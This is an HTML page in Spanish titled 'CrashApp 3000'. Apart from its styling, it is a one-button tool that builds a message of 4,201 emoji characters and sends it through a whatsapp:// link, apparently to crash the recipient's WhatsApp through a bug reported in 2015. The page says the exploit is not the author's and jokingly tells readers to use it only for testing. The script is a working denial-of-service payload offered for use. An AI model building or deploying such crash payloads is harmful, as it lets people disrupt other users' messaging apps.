<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=420"/>
<meta name="description" content="Crea tus letras para whatsapp">
<meta name="keywords" content="C칩digo, Emoticonos, WhatsAss, WhatsApp, Iconos">
<meta name="author" content="Xirzag y Petadores S.A.">
<link rel="shortcut icon" href="img/whatsapp-by-apk_hd.png">
<title>WhatsApp Petadator</title>
</head>
<style>
input[type=button]{
	background-color: #F7F7F7;
	border: thin solid #888;
	color:  #555;
	border-radius: 4px;
	box-shadow: inset -1px -2px 2px 2px rgba(0,0,0,0.2);
	webkit-box-shadow: inset -1px -2px 2px 2px rgba(0,0,0,0.2);
	cursor:pointer;	
}

input[type=text]{
	background-color: #FFF;
	border: thin solid #888;
	color:  #555;
	border-radius: 4px;
	box-shadow: inset -1px -0px 3px 3px rgba(0,0,0,0.15);
	webkit-box-shadow: inset -1px -0px 3px 3px rgba(0,0,0,0.15);
	cursor:text;
}

input[type=text]:hover, input[type=text]:focus{
	background-color: #FFF;
	border: thin solid #666;
	color:  #333;
	box-shadow: inset -1px -0px 3px 3px rgba(0,0,0,0.1);
	webkit-box-shadow: inset -1px -0px 3px 3px rgba(0,0,0,0.1);
}

input[type=button]:hover{
	background-color: #FFF;
	border: thin solid #666;
	color:  #333;
}
body{
	transition:all 0.3s ease-in-out;
	webkit-transition:all 0.3s ease-in-out;	
	background-color: #FFC;
	text-align:center;
	font-family:Verdana, Geneva, sans-serif;
}
#todo{
	position: absolute;
	top: 0px;
	left: 0px;
	width: 100%;
}
#titulo{
	line-stacking-strategy:inline-line-height;
	overflow: hidden;
    white-space: nowrap;
	resize:none;
	padding-top:6px;
	padding-bottom:6px;
	background-color: #333;
	color: #FFF;
	top:0px;
	left:0px;
	width:100%;
	font-size:20px;
	box-shadow: inset 0 0 20px rgba(0,0,0,0.8);	
	webkit-box-shadow: inset 0 0 20px rgba(0,0,0,0.8);
	z-index:15;	
}
#writer{
	position:relative;
	padding:20px;
	margin-bottom:20px;
	background-color: #FFF;
	box-shadow:4px 4px 3px rgba(0,0,0,0.5);
	webkit-box-shadow:4px 4px 3px rgba(0,0,0,0.5);
	left:25%;
	width:50%;
	min-height:100px;
}
#toolBox{
	padding-top:15px;
	padding-bottom:20px;
	background-color: #EEE;
	width:100%;
	font-size:14px;
	box-shadow: inset 0 0 20px rgba(0,0,0,0.3);
	webkit-box-shadow: inset 0 0 20px rgba(0,0,0,0.3);		
}
.emoBoton{
	transition:all 0.3s ease-in-out;
	webkit-transition:all 0.3s ease-in-out;
	cursor:pointer;		
}
.emoBoton:hover{
	transform:scale(1.2,1.2);
	webkit-transform:scale(1.2,1.2);	
}
#emoBox{
	transition:all 0.3s ease-in-out;
	webkit-transition:all 0.3s ease-in-out;	
	overflow:scroll;
	margin: 0 auto;
    
	box-shadow: inset 0 0 20px rgba(0,0,0,0.3);
	webkit-box-shadow: inset 0 0 20px rgba(0,0,0,0.3);
	position:relative;
	text-align:center;
	height:120px;
	max-height:120px;
	width:230px;	
}
#share{
	opacity:0.5;
	position: relative;
	display:block;
	left: 0px;
	width: 35px;
	height: 35px;
	/*background-image: url(http://www.icon2s.com/img256/256x256-black-white-android-share.png);*/
	background-image: url(img/share.png);
	background-size:35px 35px;
	background-repeat: no-repeat;
	background-position: left center;
	transition:all 0.3s ease-in-out;
	webkit-transition:all 0.3s ease-in-out;
	cursor:pointer;		
}
#share:hover{
	opacity:1;
	transform:scale(1.2,1.2);
	webkit-transform:scale(1.2,1.2);	
}
#opciones{
	transition:all 0.3s ease-in-out;
	webkit-transition:all 0.3s ease-in-out;
	opacity:0;	
	top:42px;
	left:0px;
	display:none;
	position:fixed;
	width:100%;
	background-color:#FFF;
	z-index:10;
	bottom:0px;
	
}
#opList{
	transition:all 1s ease-in-out;
	webkit-transition:all 1s ease-in-out;	
	top:42px;
	left:0px;
	display:none;
	width:100%;
	z-index:11;
	
	
	position:absolute;
	overflow:visible;
	list-style: url(img/arrow-13-16.png);
	text-align:left;
	padding-left:4%;	
}

#opList li{
	font-weight:bold;
	padding-top:10px;
	padding-bottom:5px;
}
#subMenu input{
	padding-left:8%;
}
#page{
	transition:all 1s ease-in-out;
	webkit-transition:all 1s ease-in-out;	
}
#space{
	position:absolute;
	display:marker;	
}
</style>
<body>
<div id="todo">
<div id="titulo"><img style="transform:translate(0,4px)" src="img/whatsapp-by-apk_hd.png" width="30px" height="30px" alt="WhatsAss" />CrashApp 3000</div>
<div id="page">
<div id="toolBox" style="padding: 40px 0px 40px 0px"> 
    <noscript>Activa javascript para poder usar esta aplicaci칩n <br/></noscript>
    Solo utilicelo para probar que funciona }:D<br /><br />
    El xploit no es mio, para m치s informaci칩n: <a href="http://thehackernews.com/2015/12/whatapp-crash-bug.html">The Hacker News</a><br /><br />
</div>
<br />
<br />
<div id="writer">
<input type="button" style="margin:20px 0px 15px 0px;padding: 20px; font-size: 1.5em; color:red; text-shadow: 0px 0px 4px red" onclick="create()" value="Petar" />
</div>
</div>
<script type="text/javascript" src="scripts/fonts_and_icons3.js"></script>
<script type="text/javascript">

function create(){
	var txtXplt = "";
	for(var i = 0; i < 4201; i++) {
		txtXplt += "&#x1f4a9";
	}
	document.location = "whatsapp://send?text="+encodeURIComponent(uniDecode(txtXplt));
}

function uniDecode(str){
	var text, p=document.createElement('p');
    p.innerHTML=str;
    text= p.innerText || p.textContent;
    p.innerHTML='';
    return text;	
}
</script>
</div>
</body>
</html>
